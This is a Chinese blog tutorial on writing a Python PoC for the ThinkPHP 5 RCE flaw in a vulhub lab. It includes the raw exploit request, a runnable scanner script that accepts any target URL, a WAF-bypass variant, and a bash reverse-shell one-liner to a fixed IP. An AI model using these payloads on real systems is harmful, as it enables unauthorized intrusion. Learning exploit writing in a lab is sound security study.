初探poc&exp

于 2024-08-13 12:30:00 发布
阅读量904 收藏 15
点赞数 7
分类专栏: 安全开发 python 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73783299/article/details/141087957
版权

记录入门安全开发的学习笔记,供日后回顾。

poc和exp的区别

poc:漏洞验证

exp:漏洞利用

它们两个的本质区别是使用的 payload 不同 , 比如一个远程命令执行的漏洞 , 当payload是id/whoami这样的命令时 , 整个脚本或工具就是poc , 因为它只是执行简单的系统命令来判断目标是否存在漏洞。

如果payload是一串反弹shell的系统命令,比如 /bin/bash -i >& /dev/tcp/192.168.101.48/5656 0>&1 ,整个工具就是一个exp。

编写thinkphp5 rce的poc

首先要搭建vulhub环境,这里我用的ubuntu。搭建流程可以自行百度,我只展示我在搭建过程中遇到的问题及解决方法。

如果docker安装较慢,可以参考这篇:在ubuntu上安装cfw并使用

搭建好环境后,进入相应目录,并启动环境:

cd vulhub-master/thinkphp/5.0.23-rce
docker-compose up -d

如果在拉取镜像时出现:

需使用镜像加速器,参考:Docker安装完成运行hello-world镜像失败

重启后如果出现这种情况,运行 docker compose up -d 即可

在浏览器访问

OK,我们开始编写poc

post传参,数据包如下,访问网站的/index.php?s=captcha目录,system执行id命令

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

在github上下载一个bp的插件(burp-requests releases:Release v0.2.4 · silentsignal/burp-requests · GitHub),用于复制请求

将请求粘贴到pycharm中,这里我去除了burp0_

import requests

url = "http://192.168.41.139:8080/index.php?s=captcha"
headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0", "Origin": "http://192.168.41.139:8080", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://192.168.41.139:8080/index.php?s=index/\\think\\app/invokefunction&function=system(phpinfo)&vars[0]=100", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Connection": "close"}
data = {"_method": "__construct", "filter[]": "system", "method": "get", "server[REQUEST_METHOD]": "id"}
requests.post(url, headers=headers, data=data)

将其放入main()函数。

为了测试网站是否存在该漏洞,我们需要输入被测网站的 URL,因此需要为 main() 函数设置一个参数。

import requests

def main(url):
    url = f"{url}/index.php?s=captcha"
    headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0", "Origin": "http://192.168.41.139:8080", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://192.168.41.139:8080/index.php?s=index/\\think\\app/invokefunction&function=system(phpinfo)&vars[0]=100", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Connection": "close"}
    data = {"_method": "__construct", "filter[]": "phpinfo", "method": "get", "server[REQUEST_METHOD]": "-1"}
    requests.post(url, headers=headers, data=data)

然后写漏洞判断条件:如果返回状态码为200,且内容中存在uid=,则说明存在漏洞

    if response.status_code == 200 and "uid=" in response.text:
        print(f"[+]{url}存在远程命令执行漏洞")
    else:
        print(f"[-]{url}不存在远程命令执行漏洞")

当然,实际测试时,网站不一定能够正常访问,我们这里加一个try……except和一些参数,如有异常,直接退出

    try:
        response = requests.post(url, headers=headers, data=data, verify=False, timeout=5, allow_redirects=False)
    except Exception as e:
        print(f"[-]{url} 请求失败")
        print(e)
        sys.exit(1)

这样main函数就差不多了

def main(url):
    full_url = f"{url}/index.php?s=captcha"
    headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0",
               "Origin": "http://192.168.41.139:8080", "Content-Type": "application/x-www-form-urlencoded",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
               "Referer": "http://192.168.41.139:8080/index.php?s=captcha",
               "Accept-Encoding": "gzip, deflate, br",
               "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Connection": "close"}
    data = {"_method": "__construct", "filter[]": "system", "method": "get", "server[REQUEST_METHOD]": "id"}
    try:
        response = requests.post(full_url, headers=headers, data=data, verify=False,
                                 timeout=5, allow_redirects=False)
        # 2.判断是否存在漏洞
        if response.status_code == 200 and "uid=" in response.text:
            print(f"[+]{url}存在远程命令执行漏洞")
        else:
            print(f"[-]{url}不存在远程命令执行漏洞")

    except Exception as e:
        print(f"[-]{url} 请求失败")
        print(e)
        sys.exit(1)

继续往下,使用argparse模块接收用户输入的参数,并加上banner信息

if __name__ == '__main__':
    banner = """
,--------.,--.     ,--.        ,--.    ,------. ,--.            ,-----.
'--.  .--'|  ,---. `--',--,--, |  |,-. |  .--. '|  ,---.  ,---. |  .--'    ,--.--. ,---. ,---.
   |  |   |  .-.  |,--.|      \|     / |  '--' ||  .-.  || .-. |'--. `\    |  .--'| .--'| .-. :
   |  |   |  | |  ||  ||  ||  ||  \  \ |  | --' |  | |  || '-' '.--'  /    |  |   \ `--.\   --.
   `--'   `--' `--'`--'`--''--'`--'`--'`--'     `--' `--'|  |-' `----'     `--'    `---' `----'
                                                         `--'
                                                                                  version: 1.0
"""
    print(banner)
    # 使用argparse去解析命令行传来的参数
    parser = argparse.ArgumentParser(description="thinkphp5 rce exp",
                                     formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent(
            '''example:python3 tp5exp.py -u http://192.168.1.108'''))
    # 添加参数
    parser.add_argument("-u", "--url", dest="url", type=str, help="input a url")
    # 把参数的值解析到对象中
    args = parser.parse_args()
    main(args.url)

报错:

由于代理问题导致请求失败,改一下代码,禁用代理

proxies = {
    "http": None,
    "https": None,
}
response = requests.post(full_url, headers=headers, data=data, verify=False,
                         timeout=5, allow_redirects=False, proxies=proxies)

上述代码基本实现了漏洞检测功能。然而,如果目标网站使用了 WAF(Web 应用防火墙),system 命令可能会被拦截。我们可以通过修改 data 数据为 data = {"_method": "__construct", "filter[]": "phpinfo", "method": "get", "server[REQUEST_METHOD]": "-1"} 来绕过 WAF 的检测,并且调整判断条件,以使漏洞检测更加准确。

如有错漏,欢迎指正。

xl1nv
关注
  • 7
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初探POC编写
博客地址 www.sec0nd.top
07-22 1676
想锻炼一下编程能力,师兄说以后很重要的,最好学好一点但是我又想学习安全相关的,那就来练练pocPoC(全称ProofofConcept),中文译作概念验证。在安全界,你可以理解成为漏洞验证程序(本教程中,如无特别说明,默认代表漏洞验证程序),当然你要强行说我说的不对,我肯定支持你,反正我没打算反驳你。和一些应用程序相比,PoC是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。...
POCEXP、Payload的区别
CC__Faker的博客
06-07 5397
POCEXP、Payload的区别 POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 总结一下自己的理解 POC:强调发现可能存在漏洞后,对漏洞是否存在的验证 EXP:对已存在的漏洞进行利用,强调利用已有资源 Payload:例如使用了一条恶意SQL语句,使
渗透中 PoCExp、Payload 与 Shellcode 的区别
qq_62292176的博客
04-29 749
POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。 2. 几点注意 POC是用来证明漏洞存在的,EXP是用来...
渗透中PoCExp、Payload与Shellcode的区别
educat0r的博客
02-21 556
PoC,全称“Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。 Exp,全称“Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。 Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode,简单翻译“shell代码”,是Payload的一种,由于其建立正向/反向shell而得名。 几点注意: PoC是用...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 872
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
渗透中 POCEXP、Payload、Shellcode 的区别
Bulldozer_GD的博客
09-19 1210
想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的窃听器,这一天你所做的就是一个EXP,你在他家所做的就是不同的Payload,就把窃听器当作Shellcode吧!
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析(毕业设计&课程设计&项目开发)
04-22
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python编写的Web安全检测PoC&&EXP框架+...
POC&EXP编写指南.rar
02-11
POC&EXP编写指南》是一份非常实用的资料,主要涵盖了网络安全领域中的Proof of Concept(POC)和Exploit(EXP)的编写方法。在网络安全研究中,POC是证明某一安全漏洞存在的一种技术性验证,而EXP则是利用这个漏洞...
Vulnerabilities:漏洞PoCExp收集; Vulnerabilities PoC & Exp collections
05-25
针对Windows的PoC很多会被杀毒软件拦截,此为正常现象,请自行斟酌是否下载,如果有带有后门的exp,请通过提交issue联系我。 Windows Microsoft Windows SMB远程代码执行漏洞(永恒之蓝) Microsoft IIS 6.0 远程...
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
My-Penetration-Tools:记录下自己写的一些懒人脚本,涉及信息收集,漏洞PocExp
03-15
在漏洞Poc(Proof of Concept)和ExpExploit)阶段,脚本可能包括: 1. **Poc脚本**:验证已知漏洞的存在,通常通过发送特定的请求来触发潜在的漏洞。 2. **Exp脚本**:一旦确认了漏洞,这些脚本将尝试利用它,...
【关注观星公众号】渗透系列之POC编写之刷分大法
Websec
12-04 5688
一、前言:POC&EXP 什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。在信息安全里,POC为漏洞验证程序,功能为检测漏洞是否存在。pocexp(全称Exploit)的区别就是,poc是漏洞验证程序,exp是漏洞利用程序。针对通用型应用漏洞编写poc,可
生命在于学习——Python学习日记(终)
易水哲的博客
10-15 490
本篇文章记录的是Python编写pocexp的知识。
PoCExp、Payload的简单概念
z1moq的博客
07-26 2118
PoC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。仅用于漏洞的验证,并无较强的攻击效果,并不容易给服务器造成损害与资产泄露 Exp:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。具有较强的攻击性,可能会造成服务器端的信息泄露或恶意控制 Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。Payload有很多种,它可以是Shellcode,也可以直接是一段系统命令。同一个Pa
渗透测试常见专业术语
m0_69043895的博客
02-20 801
一篇文章学会网络安全专用术语
渗透测试常用术语总结
xv66666的博客
07-02 2503
想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的录音笔,这一天你所做的就是一个EXP,你在他家所做的就是不同的Payload,就把录音笔当作Shellcode吧!
【安全】漏洞名词扫盲(POCEXP,CVE,CVSS等)
热门推荐
qqchaozai的专栏
12-16 2万+
POC(Proof of Concept) 漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在 EXPExploit) 漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本) 0DAY 含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。 CVE(Common Vulnerabilities & Exposures) 公共漏洞和...
【网络安全—渗透测试常用名词术语介绍篇】
旺仔Sec&blog
02-18 2068
POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。Shellcode:简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。
渗透测试中POCEXP、Payload与Shellcode的区别
gaily123的博客
03-21 1463
POCEXP、Payload与Shellcode POC,全称”Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。 EXP,全称”Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。 Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode,简单翻译“shell代码”,是Payload的一种,由于其建立正向/反向shell而得名。 几点注意 PoC是用来证明漏洞存在的,Exp是用来利用漏洞的,两者通常不是.
POC/EXP是什么
最新发布
08-22
POC(Proof of Concept)和EXPExploit)都是网络安全领域的术语: 1. **Proof of Concept (PoC)**:这是一种演示概念或理论的技术手段,通常用于验证某个安全漏洞是否存在、是否可以被利用,或者新提出的攻击技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值